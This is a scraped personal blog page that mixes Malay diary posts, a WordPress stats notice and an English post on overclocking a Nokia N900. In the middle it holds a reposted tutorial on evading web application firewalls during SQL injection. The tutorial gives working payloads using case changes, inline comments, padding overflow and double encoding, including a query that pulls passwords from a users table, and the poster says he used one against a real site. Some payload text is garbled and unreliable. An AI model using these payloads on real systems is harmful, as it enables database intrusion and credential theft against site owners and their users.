oct 12 2017

assalam… bapak lame ak xupdate pepe kat sini…jeng… haha… so, korg semua sehat? skrg zmn media sosial, msti da ramai xbaca blog2 bodoh gni…haha… ok cau dl, ade kje…nxt time ak update…


Bypassing WAF Filters in SQLi


Now i m goin to show how to bypass WAF filters.

Before All make sure u have knowledge in SQLi.

Ok Let’s Start..

What is WAF or Web Application Firewall>?

-A web application firewall (WAF) is an appliance,server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Some website are using WAF filter.

If u found a vuln sites that have waf and u try to inject a Union based query and its Show’s Not Acceptable, 403 forbidden or Web Application FIrewall ALERT..That means the query or syntax that u inject is Filter or Blocked by WAF.

Ok now here’s some method to Bypass WAF filters.


SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in SQL:

//, ? , /**/, #, ?+, ? -, ;

2)Case Changing:

Some WAF?s will filter only lowercase attacks As we can see we can easily evade this by case changing:

Possible Regex filter:


id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)

3)Inline Comments:

Some WAF?s filter key words like /union\sselect/ig We can bypass this filter by using inline comments most of the time, More complex examples will require more advanced approach like adding SQL keywords that will further separate the two words:


Take notice of the exclamation point /*!code*/ The exclamation point executes our SQL statement.

Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example, let?s pretend a site filters union,where, table_name, table_schema, =, and information_schema.. These are 3 statements we need to inject our target.

For this we would:

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()? –

The above code would bypass the filter. Notice we can use ?like? instead of ?=?

Another way to use inline comemnts, when everything seems to fail you can try to through the application Firewall off by crafting a SQL statement using variables:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()? –

The above code should bypass the Union+select filters even where common inline comments didn?t work itself

4)Buffer Overflow:/Unexpected input:

A lot of WAFS are written in the C language making them prone to overflow or or act differently when loaded with a bunch of data. Here is a WAF that does it?s job correctly, but when given a large amount of Data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A?s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),use r(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26


This bypass above works. I myself just used this against a Web site recently.

5)Replaced keywords(preg_replace and/or WAF?s with the same action

Sometimes and application will remove all of a keyword. For instance, let?s say we have a filter that replaces union select with whitespace. We could bypass that filter like so:


As you can see once union+select has been removed our capital UNION+SELECT takes its place successfully injecting our query:


6)Character encoding:

Most WAF?s will decode and filter an applications input, but some WAFs only decode the input once so double encoding can bypass certain filters as the WAF will decode the input once then filter while the Application will keep decoding the SQL statement executing our code.

Examples of double encoding:

id=1%2f%2a*/UNION%2f%2a /SELECT%2f%2a*/1,2,password%2f%2a*/FROM%2f%2a*/Users?+ 

[# Tut By Pain006 ]

when you get an error at a number, that number will be ONE TOO MUCH. so don’t count it.

for example, order by 8 <= no error | order by 9 <= error, then we have 8 columns. and it will be union all select 1,2,3,4,5,6,7,8– –


16 Jamadil-Awwal 1436 Hijriyyah.

Assalamu’alaikum warahmatullahi wabaarakaatuh.

Alhamdulillah, syukur kehadrat Illahi kerananya, aku masih diberi nafas untuk meneruskan kehidupan di bumi-Nya untuk terus berusaha dalam mengerjakan amal ibadat yg diperintahkan..masih diberi kekuatan untuk berdiri, masih diberikan hati yg kuat untuk memahami, masih gagah untuk berjalan dan masih mampu untuk menaip sepatah dua kata dalam public diari aku yang banyak kekurangan ini.

Hari ni, genaplah 29 tahun lepas aku dilahirkan. Allah sahaja yang tahu macammana kehidupan aku selama 7 tahun di kotaraya Kuala Lumpur. Aku nak ucapkan selamat hari lahir buat teman-teman ku yg menyambut hari lahir pada 6 Mac ini yakni Aida, Akma n Faridah… Semoga kalian selalu dirahmati Allah s.w.t , dilimpahkan rezeki yang melimpah ruah, dikurniakan kesihatan yang berpanjangan, dan diberkati dengan umur yang panjang.

Aku bersyukur kehadrat Illahi kerana menganugerahkan aku dengan keluarga yang menyayangi aku, sahabat handai yang selalu membantu aku dikala susah, teman seperjuangan di MML, MPI, SMKDAM, UiTM, dan UniKL ( maaf, tak sebut nama korang ).. Dan xlupa juga buat insan tersayang Afzan yg sentiasa ada dibelakangku ( walaupun kadang-kadang berada dihadapanku ). Kalian semua akan selalu aku doakan.



Posted from Nokia N900

2014 in review

The WordPress.com stats helper monkeys prepared a 2014 annual report for this blog.

Here’s an excerpt:

The concert hall at the Sydney Opera House holds 2,700 people. This blog was viewed about 12,000 times in 2014. If it were a concert at Sydney Opera House, it would take about 4 sold-out performances for that many people to see it.

Click here to see the complete report.

jz updated

salam geng…

ak rse da lme ngat ak xupdate ape2 kt cni…huhu…al-maklumlah kebizian yang memanjang jer…n skrg ak da upgrade kje dr technician dl kepada network engineer…ALHAMDULILLAH….rezeki bertambah lg…leh cpt sikit kawen nt…kikiki…n pada budak2 MIIT, siyes, ak rse cam nk jmpe korg…lpk n gelak2 cam dl…haish…xabis2 perangai budak2 ak kn…tp tu lah ak…hehe…memg ade ank nt pon cmni la perangai ak…

kadang2 ak terpk gk mne ilangnya hekmah sengal, dayah, mira, shah, ayoi, kiko, ijat pacat, bana, mamu sume…nmpak kt pesbuk jela ug updatenye…pejam celik pejam celik da 2014 skrg…n dh nk msk feb dh…bnyak sngt bnda yg ‘berlaku’ spnjg 2 taun nih…n plg penting cik are la yg sll ade kt sebelah ak time susah senang…haha…

ketika ak sedang menaip nih, ak kt KLIA2…benti pnt sat jauh dh perjalanan ak hr ni…idup lam projek cmni la jadinya…xde life langsung rse…yg taw, siang2 site, malam2 kt umh jelah…bl badan dah penat, otak da letih, mmg xdan la nk mikir psl blog nih…ak belek bce blk blog2 ak dr zmn2 awl perkenalan dengan si blog nih…huhu…ade lg blogspot ak…ak ingt dh del ats sb2 tertentu…tp xilang gk dr tenet nih….encik amran, boleh x ajar ana hack server internet nih…sifu bana pon tulung la…

kehadapan sahabatku cik dayah, bl nk mkn bubur jagung nih???????

kepada bff ak,cik nora, bl nk blk mesia nih??? nt blk gtaw yer..dh la pegi hrtu xgtaw…

ak akn luang kan mse ak kt kg nxt week sambut raya..hehe. tdo kt pantai mlm2 pon bez gk…release tension… kna pk kn ape next step ak nih…bnyk bnda yg nk buat…haha…so, sekian dl…kna smbung kje blk…



 i am currently using Linux kernel and the desktop widget MaxCPU to quickly overclock or reduce CPU usage on my Nokia N900. MaxCPU has a range starting at 250MHz with levels at 500MHz, 550MHz, 600MHz (default), 700MHz, 750MHz, 805MHz, 850MHz, 900MHz, 950MHz, 1000MHz, 1100MHz and 1150MHz.

I am not quite sure what the limit is for the Nokia N900, since I have been pushing it for quite some time, but I think I have reached a milestone in numbers. Currently my setup is:

  • Version 20.2010.36.2 (PR1.3).
  • 9 unique desktops.
  • 81 desktop shortcuts.
  • 22 loaded widgets (CPU x 3, Touch Search, Desktop Browser x 9, Conversations, Queen Beacon x 4, Calendar, Forca Weather, OMWeather, Feeding it).
  • 95 245 applications in the menu. (edit: 19/06/2011).
  • Overclocked to 1000mhz and stable.

Overclocking the N900 makes all the difference in performance, although it can cause the device to be quite unstable if the wrong configuration is used, so it takes a lot of patience and fiddling to get the right set up.

Some of the resources I have used to date for overclocking:

  1. Jakiman’s N900 Overclocking Guide – This is a brilliant guide and works exactly as the steps suggest.
  2. Titan – more configuration options. Very useful if you want to add your own settings.
  3. Tonism – offers the latest starving configuration for titan kernel!
  4. Jakiman offers some extra steps for setting the same MIN and MAX settings (e.g. 1000 1000). These are the settings I applied after I successfully completed step 1 and they work brilliantly. My N900 is super fast now and surprisingly very stable. I managed to open 56 applications (before it started to falter).
  5. Queen Beacon Widget – This widget is amazing in it’s own right but is key to the over clocking process.
  6. Bakuur has a complete step by step guide on overclocking and using the Queen Beacon Widget (with diagrams). – Very cool!
  7. Jakiman’s name pops upagain and here is his guide to using Queen Beacon and overclocking. – This is what I used and it works!
  8. Lehto is another cool customer overclocking his N900 and reporting on the different speeds achieved.
  9. Finally all these brilliant people can be found at Maemo.org in the forums sharing their knowledge and it should be the place where you go first to read up on Overclocking the N900. This topic has managed to generate 495 pages so far, which just goes to show how popular this topic is.

Below are ten large (content heavy) websites that I loaded up with ease with my 1000Mhz setup.

The screen below shows the CPU widget showing 1000MHz. I have fixed the MIN and MAX to 1000MHz. I was running my N900 all day at 1000MHz and it was fast, very responsive, and an absolute pleasure to use.